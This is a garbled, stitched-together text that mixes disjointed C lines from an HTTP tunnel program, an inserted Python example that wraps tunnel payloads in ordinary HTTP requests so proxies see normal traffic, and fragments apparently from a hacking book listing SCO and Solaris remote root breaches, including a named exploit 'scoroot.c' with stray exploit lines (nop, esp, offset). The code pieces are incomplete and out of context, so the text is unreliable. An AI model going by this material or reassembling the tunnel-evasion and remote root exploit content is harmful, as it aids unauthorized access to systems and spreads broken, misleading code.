memmove (data + 2, data, n);
memcpy (data, buf, 2);
static inline Http_response *
http_allocate_response (const char *status_message)
response->major_version = atoi (data);
log_verbose ("http_parse_response: major version = %d", response->major_version);
response->minor_version = atoi (data);
log_verbose ("http_parse_response: minor version = %d", response->minor_version);
response->status_code = atoi (data);
log_verbose ("http_parse_response: status code = %d", response->status_code);
static inline Http_request *
http_allocate_request (const char *uri)
http_create_request (Http_method method,
const char *uri,
request->major_version = atoi (data);
log_verbose ("http_parse_request: major version = %d",
request->minor_version = atoi (data);
log_verbose ("http_parse_request: minor version = %d",
free ((char *)request->uri);
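The excerpt above shows the three pieces a tunnel of this kind needs: http_method() wraps the tunnel payload in an ordinary request with a Host header of host:port, http_parse_response() pulls the major/minor version and status code out of the reply, and http_error_to_errno() turns an HTTP status into an errno. As an added example, not code from the original page or from the tunnel program it excerpts, here is the same framing and parsing in Python, with the parser enforcing Content-Length against the bytes actually received. The host name, port, URI and response bytes are made up for illustration, and the errno mapping is a simplified form of the excerpt's (2xx succeed, 404 becomes ENOENT, everything else EIO).

```python
import errno
import re

# the methods the excerpt's http_method_to_string() knows about
METHODS = ("GET", "PUT", "POST", "OPTIONS", "HEAD", "DELETE", "TRACE")


def build_tunnel_request(method, host, port, uri, payload):
    """Wrap a tunnel payload as an HTTP request body: Host carries host:port
    and Content-Length frames the payload, so an intervening proxy sees only
    a normal request."""
    if method not in METHODS:
        raise ValueError(f"unsupported method {method!r}")
    head = (f"{method} {uri} HTTP/1.1\r\n"
            f"Host: {host}:{port}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            "Connection: close\r\n\r\n")
    return head.encode("ascii") + payload


_STATUS_LINE = re.compile(rb"^HTTP/(\d+)\.(\d+) (\d{3})(?: (.*))?$")


def parse_http_response(raw):
    """Split a raw response into version, status, reason, headers and body.
    A Content-Length larger than the bytes received is treated as an error
    rather than silently returning a short body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.split(b"\r\n")
    m = _STATUS_LINE.match(lines[0])
    if not m:
        raise ValueError("malformed status line")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise ValueError("malformed header line")
        headers[name.strip().lower().decode("ascii")] = value.strip().decode("latin-1")
    if "content-length" in headers:
        n = int(headers["content-length"])
        if len(body) < n:
            raise ValueError("truncated body")
        body = body[:n]
    return {"version": (int(m.group(1)), int(m.group(2))),
            "status": int(m.group(3)),
            "reason": (m.group(4) or b"").decode("latin-1"),
            "headers": headers, "body": body}


def http_error_to_errno(status):
    """Simplified form of the excerpt's mapping: 2xx succeed, 404 -> ENOENT,
    everything else -> EIO."""
    if 200 <= status <= 299:
        return 0
    if status == 404:
        return errno.ENOENT
    return errno.EIO


if __name__ == "__main__":
    req = build_tunnel_request("POST", "tunnel.example", 8888, "/index.html", b"\x00\x01\x02")
    print(req)
    # constructed reply, with trailing bytes beyond Content-Length that must be ignored
    resp = parse_http_response(b"HTTP/1.1 200 OK\r\nContent-Length: 3\r\n\r\nabcXYZ")
    print(resp["status"], resp["body"], http_error_to_errno(resp["status"]))
```

From the defender's side the same framing is what makes such tunnels hard to spot at the proxy: the request is well-formed HTTP, and only the opaque body, the odd host:port pairing and the traffic pattern give it away.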
Figure 10.20 SCO graphical interfaces
Liabilities
POP Root Accessibility
Synopsis: POP remote root security breach for SCOPOP server
Hack State: Unauthorized access
Vulnerabilities: SCO OpenServer 5x
Breach: scoroot.c
scoroot.c
#include <stdio.h>
#include <stdlib.h>
exit(0);
}
sa.sin_family=AF_INET;
Figure 10.21 Customizing partitions with Solaris
Solaris
Sun Microsystems’ Solaris (www.sun.com/solaris) version 8 UNIX O/S is the industry’s first and most popular dot-com-grade operating environment for Intel and SPARC systems. Since its release, Sun has received positive reviews in such publications as PC Magazine and InfoWorld. There are eight features that, industrywide, can be used to evaluate Solaris 8: advanced security, availability, scalability, interoperability, ease of use, multiplatform connectivity, comprehensive open-source development, and last but certainly not least, it’s available free of charge by downloading from www.sun.com/software/solaris/source. Solaris 8 also can preserve existing operating systems and data (see Figure 10.21).
Liabilities
Root Accessibility
Synopsis: Various remote root security breaches
Hack State: Unauthorized access
unsigned long int nop, esp;
long int offset = 0;
unsigned long int